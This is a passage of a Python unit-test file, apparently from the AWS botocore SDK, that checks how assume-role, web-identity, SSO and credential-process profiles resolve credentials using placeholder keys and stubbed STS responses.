'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_b_creds = self.create_random_credentials()
profile_b_response = self.create_assume_role_response(profile_b_creds)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_b_response)
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_recursive_assume_role_stops_at_static_creds(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_infinitely_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
)
self.write_config(config)
with self.assertRaises(InfiniteLoopConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_process_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'credential_process = %s\n' % self.credential_process
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# credential process.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': 'spam',
'aws_secret_access_key': 'eggs',
'aws_session_token': None,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, stubber = self.create_session(profile='A')
identity_creds = self.create_random_credentials()
identity_response = self.create_assume_role_response(identity_creds)
stubber.add_response(
'assume_role_with_web_identity',
identity_response,
)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# assume role with web identity call.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': identity_creds.access_key,
'aws_secret_access_key': identity_creds.secret_key,
'aws_session_token': identity_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# The config is split between the profile and the env, we
# should only be looking at the profile so this should raise
# a configuration error.
with self.assertRaises(InvalidConfigError):
session.get_credentials()
def test_sso_source_profile(self):
token_cache_key = 'f395038c92f1828cbb3991d2d6152d326b895606'
cached_token = {
'accessToken': 'a.token',
'expiresAt': self.some_future_time(),
}
temp_cache = JSONFileCache(self.tempdir)
temp_cache[token_cache_key] = cached_token
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'sso_region = us-east-1\n'
'sso_start_url = https://test.url/start\n'
'sso_role_name = SSORole\n'
'sso_account_id = 1234567890\n'
)
self.write_config(config)
session, sts_stubber = self.create_session(profile='A')
client_config = Config(
region_name='us-east-1',
signature_version=UNSIGNED,
)
sso_stubber = session.stub('sso', config=client_config)
sso_stubber.activate()
# The expiration needs to be in milliseconds
expiration = datetime2timestamp(self.some_future_time()) * 1000
sso_role_creds = self.create_random_credentials()
sso_role_response = {
'roleCredentials': {
'accessKeyId': sso_role_creds.access_key,
'secretAccessKey': sso_role_creds.secret_key,
'sessionToken': sso_role_creds.token,
'expiration': int(expiration),
}
}
sso_stubber.add_response('get_role_credentials', sso_role_response)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
sts_stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
sts_stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# SSO get role credentials response
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': sso_role_creds.access_key,
'aws_secret_access_key': sso_role_creds.secret_key,
'aws_session_token': sso_role_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_credential_source_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = token_path
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# We should not get credentials from web-identity configured in the
# environment when the Environment credential_source is set.
# There are no Environment credentials, so this should raise a
# retrieval error.
with self.assertRaises(CredentialRetrievalError):
session.get_credentials()
def test_self_referential_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def create_stubbed_sts_client(self, session):
expected_creds = self.create_random_credentials()
_original_create_client = session.create_client
def create_client_sts_stub(service, *args, **kwargs):
client = _original_create_client(service, *args, **kwargs)
stub = Stubber(client)
response = self.create_assume_role_response(expected_creds)
self.actual_client_region = client.meta.region_name
stub.add_response('assume_role', response)
stub.activate()
return client
return create_client_sts_stub, expected_creds
def test_assume_role_uses_correct_region(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
# Verify that when we configure the session with a specific region
# that we use that region when creating the sts client.
session.set_config_variable('region', 'cn-north-1')
create_client, expected_creds = self.create_stubbed_sts_client(session)
session.create_client = create_client
resolver = create_credential_resolver(session)
provider = resolver.get_provider('assume-role')
creds = provider.load()
self.assert_creds_equal(creds, expected_creds)
self.assertEqual(self.actual_client_region, 'cn-north-1')
class TestAssumeRoleWithWebIdentity(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRoleWithWebIdentity, self).setUp()
self.token_file = os.path.join(self.tempdir, 'token.jwt')
self.write_token('totally.a.token')
def write_token(self, token, path=None):
if path is None:
path = self.token_file
with open(path, 'w') as f:
f.write(token)
def assert_session_credentials(self, expected_params, **kwargs):
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session = StubbedSession(**kwargs)
stubber = session.stub('sts')
stubber.add_response(
'assume_role_with_web_identity',
response,
expected_params
)
stubber.activate()
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = sname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'sname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
def test_assume_role_env_vars(self):
config = (
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = self.token_file
self.environ['AWS_ROLE_SESSION_NAME'] = 'bname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleB',
'RoleSessionName': 'bname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params)
def test_assume_role_env_vars_do_not_take_precedence(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = aname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
different_token = os.path.join(self.tempdir, str(uuid.uuid4()))
self.write_token('totally.different.token', path=different_token)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleC'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = different_token
self.environ['AWS_ROLE_SESSION_NAME'] = 'cname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'aname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
class TestProcessProvider(unittest.TestCase):
def setUp(self):
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
self.environ = os.environ.copy()
self.environ_patch = mock.patch('os.environ', self.environ)
self.environ_patch.start()
def tearDown(self):
self.environ_patch.stop()
def test_credential_process(self):
config = (
'[profile processcreds]\n'
'credential_process = %s\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
credentials = Session(profile='processcreds').get_credentials()
self.assertEqual(credentials.access_key, 'spam')
self.assertEqual(credentials.secret_key, 'eggs')
def test_credential_process_returns_error(self):
config = (
'[profile processcreds]\n'
'credential_process = %s --raise-error\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
session = Session(profile='processcreds')
# This regex validates that there is no substring: b'
# The reason why we want to validate that is that we want to
# make sure that stderr is actually decoded so that in
# exceptional cases the error is properly formatted.
# As for how the regex works:
# `(?!b').` is a negative lookahead, meaning that it will only
# match if it is not followed by the pattern `b'`. Since it is
# followed by a `.` it will match any character not followed by
        # that pattern. `((?!b').)*` does that zero or more times. The
# final pattern adds `^` and `$` to anchor the beginning and end
# of the string so we can know the whole string is consumed.
# Finally `(?s)` at the beginning makes dots match newlines so
# we can handle a multi-line string.
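        # Illustrative examples (not from the original test): the pattern
        # below matches fully decoded text such as "Error: it failed", but
        # rejects output containing a bytes repr such as "Error: b'boom'".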
reg = r"(?s)^((?!b').)*$"
with self.assertRaisesRegex(CredentialRetrievalError, reg):
session.get_credentials()
class TestSTSRegional(BaseAssumeRoleTest):
def add_assume_role_http_response(self, stubber):
stubber.add_response(
body=self._get_assume_role_body('AssumeRole'))
def add_assume_role_with_web_identity_http_response(self, stubber):
stubber.add_response(
body=self._get_assume_role_body('AssumeRoleWithWebIdentity'))
def _get_assume_role_body(self, method_name):
expiration = self.some_future_time()
body = (
'<{method_name}Response>'
' <{method_name}Result>'
' <AssumedRoleUser>'
' <Arn>arn:aws:sts::0123456:user</Arn>'
' <AssumedRoleId>AKID:mysession-1567020004</AssumedRoleId>'
' </AssumedRoleUser>'
' <Credentials>'
' <AccessKeyId>AccessKey</AccessKeyId>'
' <SecretAccessKey>SecretKey</SecretAccessKey>'
' <SessionToken>SessionToken</SessionToken>'
' <Expiration>{expiration}</Expiration>'
' </Credentials>'
' </{method_name}Result>'
'</{method_name}Response>'
).format(method_name=method_name, expiration=expiration)
return body.encode('utf-8')
def make_stubbed_client_call_to_region(self, session, stubber, region):
ec2 = session.create_client('ec2', region_name=region)
stubber.add_response(body=b'<DescribeRegionsResponse/>')
ec2.describe_regions()
def test_assume_role_uses_same_region_as_client(self):
config = (
'[profile A]\n'
'sts_regional_endpoints = regional\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
with SessionHTTPStubber(session) as stubber:
self.add_assume_role_http_response(stubber)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
self.make_stubbed_client_call_to_region(
session, stubber, 'us-west-2')
self.assertEqual(
stubber.requests[0].url,
'https://sts.us-west-2.amazonaws.com/'
)
def test_assume_role_web_identity_uses_same_region_as_client(self):
token_file = os.path.join(self.tempdir, 'token.jwt')
with open(token_file, 'w') as f:
f.write('some-token')
config = (
'[profile A]\n'
'sts_regional_endpoints = regional\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'web_identity_token_file = %s\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n' % token_file
)
self.write_config(config)
session = Session(profile='A')
with SessionHTTPStubber(session) as stubber:
self.add_assume_role_with_web_identity_http_response(stubber)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
self.make_stubbed_client_call_to_region(
session, stubber, 'us-west-2')
self.assertEqual(
stubber.requests[0].url,
'https://sts.us-west-2.amazonaws.com/'
)
|